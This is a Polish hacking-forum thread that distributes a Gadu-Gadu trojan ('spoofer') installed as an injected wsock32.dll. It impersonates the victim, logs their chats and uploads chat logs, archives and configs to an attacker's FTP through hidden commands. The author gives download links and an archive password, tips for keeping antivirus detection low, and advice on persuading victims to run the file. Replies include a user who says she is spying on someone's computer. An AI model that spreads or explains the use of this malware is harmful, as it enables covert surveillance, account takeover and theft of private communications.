GG spoofer by Grzonu

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
Przedstawiam nowy soft:

Możliwości:
- Podszycie sie pod osobę która ma program
- Wysyła archiwa i configi
- Zapisuje rozmowy do pliku w formacie html i wysyła na żądanie
- Zamiana wszystkich wysyłanych wiadomości do formatu h4x00r
smile.gif
np. cześć = c23ść

Dodatkowo jest całkowicie niewidoczny w procesach jako że całą "brudną robote" odwala dll`ka
Program kopiujący dll`ke sam znajduje scieżke i kopiuje tam dll`kę.

Komendy:
/help - pomoc
/spoof_on |numer| - za numer wpisujemy numer osoby z którą chcemy porozmawiać podszywając się pod ofiarę
/spoof_off - wyłącza spoofa
/h4x00r_on - wlacza zamiane wiadomości na format h4x00r
/h4x00r_off - wyłącza zamiane na format h4x00r
/sendlog |login|pass|host| - wysyła loga rozmów na podany w parametrze host adres ftp.
/sendarch |login|pass|host| - wysyła archiwa na ftp. znaczenie parametrów identyczne jak wyzej
/sendconf |login|pass|host| - wysyła configi na ftp.

Ofiara nie widzi tych komunikatów.
Nie jest wymagana konfiguracja bo i nie ma czego konfigurować.

Aby usunąć dll`kę usuwamy plik wsock32.dll z katalogu gg.

Na dzień dzisiejszy wykrywają go 2 AV( F-prot i Ikarus) i jeśli chcecie utrzymać taki poziom to nie wrzucajcie na skanery on-line ani na serwery typu sendspace bez hasła.

Linki
RAPIDSHARE
SENDSPACE

Nie zezwalam na kopiowanie softu na inne fora/strony.
I prosze o nie robienie reupów jak będzie trzeba to sam zrobie.

hasło na archiwum: QWAR@#$%^&!@#$%

Screenów nie dam bo i nie ma jak
<

Uaktywnia sie dopiero po ponownym włączeniu gg!!!
Nie ponosze odpowiedzialności za użycie programu do celów nie zgodnch z prawem!!!
 

maly3900

Użytkownik
Dołączył
Styczeń 18, 2005
Posty
362
Oj. Grzonu słońce.
Odwaliłeś kawał dobrej roboty. ;*
 

nitr0

Użytkownik
Dołączył
Maj 15, 2007
Posty
537
naaajs.. jutro musze sprawdzić xD troche zbędne to 1337.. ale tak to - grats xD
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
<div class='quotetop'>CYTAT(h4ck3r15 @ 31.05.2008, 21:49) <{POST_SNAPBACK}></div>
naaajs.. jutro musze sprawdzić xD troche zbędne to 1337.. ale tak to - grats xD[/b]

Od przybytku głowa nie boli
 

Dead333

Użytkownik
Dołączył
Maj 27, 2007
Posty
20
Program prezentuje sie naprwade świetnie.. Mam nadzieje z niego skorzystać, ale powiedz mi jedno co zrobić z tym INJECT DLL po sciągnięciu
<
? Bo nie mam pojęcia.. lol
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
wyslac i namówić osobę aby to uruchomiła po czym poczekać aż jeszcze raz uruchomi gg i potem cieszyc się ze mamy dostęp do gg
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
ty serio tak czy tylko udajesz??

Jak ofiara zresetuje gg to juz masz dostep do jej gg.
 

Dead333

Użytkownik
Dołączył
Maj 27, 2007
Posty
20
Wysylam, odpali, i jak juz odpali to dostane jakas wiadomosc od niego ze spoofer jest aktywny? I te komendy wpisywac do okna gg rozmowy z ofiara xd? Oświec..
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
<div class='quotetop'>CYTAT(jacob90 @ 5.06.2008, 14:15) <{POST_SNAPBACK}></div>
U mnie ten plik nie kopiuje sie do folderu gg. Byś mógł uploadować samo DLL'ke ?[/b]

Uwaga uwaga mam ważny komunikat!!!
jeśli ofiara nie kożysta domyślnie z ORGINALNEGO klienta gg to DLL`ka się nie zainstaluje !!!
I naprawde moje gg to nie numer do pomocy technicznej!!!
Jeśli masz problem z nim to pisz na forum
 

adam3076

Użytkownik
Dołączył
Czerwiec 22, 2006
Posty
71
bardzo fajny programik szkoda tylko ze nie ma do wyboru wersji z mailem bo gdzies ftp mi nie lezy ale i tak mi sie podoba
<
 

xXxXxXx90

Użytkownik
Dołączył
Czerwiec 5, 2008
Posty
1
Cześć. Jestem tutaj pierwszy raz. I ogólnie to pierwszy raz się bawię w takie rzeczy. Ściągnęłam sobie tego trojana. Wysłałam ten plik na ten komputer który chcę szpiegować. Wysłałam komendę /spoof_on |numer| i co dalej? Jak mam np. odczytać archiwum tego użytkownika? Na jaki parametr to zostało wysłane jeżeli wpisałam tą komendę /sendlog |login|pass|host| ?
 

3nc0re

Użytkownik
Dołączył
Sierpień 9, 2006
Posty
63
<div class='quotetop'>CYTAT(xXxXxXx90 @ 5.06.2008, 18:42) <{POST_SNAPBACK}></div>
Cześć. Jestem tutaj pierwszy raz. I ogólnie to pierwszy raz się bawię w takie rzeczy. Ściągnęłam sobie tego trojana. Wysłałam ten plik na ten komputer który chcę szpiegować. Wysłałam komendę /spoof_on |numer| i co dalej? Jak mam np. odczytać archiwum tego użytkownika? Na jaki parametr to zostało wysłane jeżeli wpisałam tą komendę /sendlog |login|pass|host| ?[/b]

musisz wpisac swoje ftp. /sendarch |Twoj Login|TwojeHaslo|np.xx.yoyo.pl|

Tak mi się zdaje ;p a pozniej to sciagasz do siebie i odpalasz? ;x
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
<div class='quotetop'>CYTAT(adam3076 @ 5.06.2008, 18:27) <{POST_SNAPBACK}></div>
bardzo fajny programik szkoda tylko ze nie ma do wyboru wersji z mailem bo gdzies ftp mi nie lezy ale i tak mi sie podoba
<
[/b]

tak zwłaszcza ze mail ma zwykle duze ograniczenia co do zalacznikow zreszta jak i ftp na yoyo.
jako ftp polecam drivehq.com
 

Szymon111

Użytkownik
Dołączył
Grudzień 11, 2006
Posty
59
Więc po ściągnięciu, wysyłam ten plik od razu ofierze i rozmawiając z nią na gg(z mojego konta) wpisuje te komendy? Więc jeśli ktoś ma ten plik to teoretycznie każdy może mu te komendy wysłać?

Czy można zrobić tak, że plik ten będzie zdjęciem i będzie można go umieścić na imageshack? a po otworzeniu się zapisze?
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
oh jasne a w trakcie sciagania jeszcze ci zrobi kanapke i przyniesie cole.
Ludzie zapamiętajcie ze exe nigdy sie nie uruchomi jak zmienicie mu rozszerzenie na jpg czy innego pliku graficznego a na img schack musi byc jpg wiec sam sobie odpowiedz.

I tak kazdy moze mu komendy wyslac
 
Do góry Bottom